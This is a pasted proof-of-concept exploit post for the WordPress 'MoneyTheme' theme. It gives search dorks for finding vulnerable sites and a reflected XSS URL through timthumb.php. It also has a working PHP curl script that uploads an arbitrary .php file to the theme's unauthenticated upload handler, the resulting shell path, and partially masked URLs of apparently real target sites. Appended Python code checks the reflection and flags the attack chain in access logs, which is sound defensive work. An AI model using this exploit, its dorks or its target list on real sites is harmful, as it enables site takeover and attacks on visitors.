[POC] Wordpress MoneyTheme Themes XSS | DevilScreaM

Posted to Pastebin by Berandal666, Mar 11th, 2017
#Title : Wordpress MoneyTheme Themes XSS / Arbitrary File Upload
#Author : DevilScreaM
#Date : 10/27/2013
#Category : Web Applications
#Type : PHP
#Vendor : http://themesjunction.com
#Link : http://themesjunction.com/theme/money_wordpress_template-17129.html


#Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded |

#Vulnerability : XSS, Arbitrary File Upload

#Dork (search strings that locate sites running the theme) :

inurl:themes/MoneyTheme/
inurl:wp-content/themes/MoneyTheme/

Cross Site Scripting

Vulnerable at 'timthumb.php'

http://site-target/wp-content/themes/MoneyTheme/timthumb.php?src=[XSS].jpg

The value of the src parameter is reflected unescaped in the response, so any HTML or script placed in it is rendered by the victim's browser. The trailing .jpg keeps the value looking like an image path.

Example :

http://cheaXXow.com/wp-content/themes/MoneyTheme/timthumb.php?src=<h1>Berandal</h1>.jpg

The <h1> tag is a harmless marker: if the page renders it as a heading, the reflection is unescaped and a script payload will run the same way.

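To confirm the reflection without firing a script in a browser, the following Python check (an added example, not part of the original paste) builds the PoC URL with proper percent-encoding and classifies a captured HTTP response as unescaped, entity-encoded, absent, or not HTML at all. That last case matters in practice: TimThumb normally answers with an image, and markup inside an image/jpeg body is not executed. The base URL and the three sample responses are constructed placeholders; real TimThumb error wording will differ.

```python
"""Check how a TimThumb-style endpoint reflects the src parameter.

Added example, not from the original paste. The base URL and the sample
responses below are constructed placeholders.
"""
from html import escape
from urllib.parse import urlencode

MARKER = "<h1>Berandal</h1>"   # harmless HTML marker from the PoC
PAYLOAD = MARKER + ".jpg"      # trailing .jpg keeps it looking like an image path


def build_poc_url(base_url, src=PAYLOAD):
    """Build the timthumb.php URL with src percent-encoded as a browser would send it."""
    return (base_url.rstrip("/")
            + "/wp-content/themes/MoneyTheme/timthumb.php?"
            + urlencode({"src": src}))


def classify_reflection(content_type, body, marker=MARKER):
    """Classify a captured response.

    Returns one of:
      "not-html"  - not served as text/html, so even a verbatim marker is not
                    rendered as markup by the browser
      "unescaped" - the marker is echoed byte-for-byte inside an HTML body (XSS)
      "encoded"   - the marker is present but HTML-entity encoded (neutralised)
      "absent"    - the marker does not appear at all
    """
    if isinstance(body, bytes):
        body = body.decode("utf-8", errors="replace")
    mime = content_type.split(";", 1)[0].strip().lower()
    if mime != "text/html":
        return "not-html"
    if marker in body:
        return "unescaped"
    if escape(marker) in body:
        return "encoded"
    return "absent"


# Constructed sample responses (not real TimThumb output).
VULNERABLE_RESPONSE = ("text/html; charset=UTF-8",
                       "<pre>Unable to open image: <h1>Berandal</h1>.jpg</pre>")
FIXED_RESPONSE = ("text/html; charset=UTF-8",
                  "<pre>Unable to open image: &lt;h1&gt;Berandal&lt;/h1&gt;.jpg</pre>")
IMAGE_RESPONSE = ("image/jpeg", b"\xff\xd8\xff\xe0\x00\x10JFIF")


if __name__ == "__main__":
    print(build_poc_url("http://site-target"))
    for name, (ctype, body) in [("vulnerable", VULNERABLE_RESPONSE),
                                ("fixed", FIXED_RESPONSE),
                                ("image", IMAGE_RESPONSE)]:
        print(name, "->", classify_reflection(ctype, body))
```

Feed classify_reflection() the Content-Type header and body from whatever client you use; "unescaped" on a text/html response is the condition the PoC URL above relies on.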

======

Arbitrary File Upload

The theme ships an upload handler at uploads/upload.php. It accepts a multipart file in the Filedata field without any authentication and writes it to the directory named by the folder parameter, so a .php file can be uploaded and then requested directly.

Exploit :

<?php
// Upload a PHP file through the theme's unauthenticated upload handler.
// 'folder' selects the destination directory; 'Filedata' is the multipart
// field name the handler expects.
$uploadfile = "berandal.php";
$target = "http://site-target/wp-content/themes/MoneyTheme/uploads/upload.php?folder=/wp-content/themes/MoneyTheme/uploads/uploads/";

$ch = curl_init($target);
curl_setopt($ch, CURLOPT_POST, true);
// CURLFile replaces the old "@filename" syntax, which PHP 5.5 deprecated and PHP 7 removed.
curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata' => new CURLFile($uploadfile)));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$postResult = curl_exec($ch);
curl_close($ch);
print $postResult;   // the handler's response (typically the stored file name or a status)
?>


Shell Access : http://site-target/wp-content/themes/MoneyTheme/uploads/uploads/berandal.php
(the uploaded file lands in the directory given by the folder parameter and is served as PHP)

berandal.php (the file to upload; phpinfo() is enough to prove code execution)
<?php
phpinfo();
?>

Demo :

http://weXXX.com/wp-content/themes/MoneyTheme/uploads/upload.php
http://coXXXash.com/wp-content/themes/MoneyTheme/uploads/upload.php
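For defenders, here is a detector (added here, not part of the original paste) that scans Apache combined-format access log lines for the three stages described above: the timthumb.php src probe carrying markup, a POST to the theme's upload.php, and a later request for a .php file under the theme's uploads tree, which is where the dropped shell is executed from. The log lines, IP addresses and host names are constructed samples; the rule names are this example's own.

```python
"""Flag MoneyTheme timthumb probes and upload.php abuse in Apache access logs.

Added example, not from the original paste. Log lines, IPs and hosts are
constructed samples in Apache combined format.
"""
import re
from urllib.parse import parse_qs, urlsplit

THEME = "/wp-content/themes/MoneyTheme/"

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Constructed sample log: one attacker (203.0.113.7) running the full chain,
# one ordinary visitor (198.51.100.4) using timthumb legitimately.
SAMPLE_LOG = """\
203.0.113.7 - - [27/Oct/2013:10:01:02 +0000] "GET /wp-content/themes/MoneyTheme/timthumb.php?src=%3Ch1%3EBerandal%3C%2Fh1%3E.jpg HTTP/1.1" 400 512 "-" "Mozilla/5.0"
203.0.113.7 - - [27/Oct/2013:10:02:15 +0000] "POST /wp-content/themes/MoneyTheme/uploads/upload.php?folder=/wp-content/themes/MoneyTheme/uploads/uploads/ HTTP/1.1" 200 23 "-" "curl/7.32.0"
203.0.113.7 - - [27/Oct/2013:10:02:20 +0000] "GET /wp-content/themes/MoneyTheme/uploads/uploads/berandal.php HTTP/1.1" 200 8831 "-" "Mozilla/5.0"
198.51.100.4 - - [27/Oct/2013:10:03:00 +0000] "GET /wp-content/themes/MoneyTheme/timthumb.php?src=http://site-target/wp-content/uploads/2013/10/banner.jpg&w=300 HTTP/1.1" 200 20480 "-" "Mozilla/5.0"
198.51.100.4 - - [27/Oct/2013:10:03:01 +0000] "GET /wp-content/themes/MoneyTheme/style.css HTTP/1.1" 200 4112 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Return the fields we need from one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def rules_for(entry):
    """Return the list of rule names a parsed log entry triggers."""
    url = urlsplit(entry["target"])
    path, query = url.path, parse_qs(url.query)   # parse_qs percent-decodes values
    hits = []
    # 1. Markup or a javascript: URL in timthumb's src parameter (the XSS vector).
    if path.endswith("/timthumb.php"):
        src = query.get("src", [""])[0]
        if "<" in src or "javascript:" in src.lower():
            hits.append("timthumb_xss")
    # 2. Any POST to the theme's upload handler; nothing legitimate should reach it unauthenticated.
    if entry["method"] == "POST" and path == THEME + "uploads/upload.php":
        hits.append("theme_upload")
    # 3. A .php file requested from under the uploads tree: the dropped shell being used.
    if (path.startswith(THEME + "uploads/") and path.endswith(".php")
            and path != THEME + "uploads/upload.php"):
        hits.append("php_in_uploads")
    return hits


def detect(lines):
    """Scan log lines; return (ip, rule, target) tuples in log order."""
    findings = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        for rule in rules_for(entry):
            findings.append((entry["ip"], rule, entry["target"]))
    return findings


def suspect_ips(findings):
    """IPs that both hit the upload handler and then executed a file under uploads."""
    by_ip = {}
    for ip, rule, _ in findings:
        by_ip.setdefault(ip, set()).add(rule)
    return sorted(ip for ip, rules in by_ip.items()
                  if {"theme_upload", "php_in_uploads"} <= rules)


if __name__ == "__main__":
    found = detect(SAMPLE_LOG.splitlines())
    for f in found:
        print(*f)
    print("upload chain completed from:", suspect_ips(found))
```

Rule 3 is also the one to act on regardless of this theme: a web server that executes .php from an uploads directory is the root cause, and denying PHP execution there (or moving uploads outside the document root) closes the hole even if upload.php remains reachable.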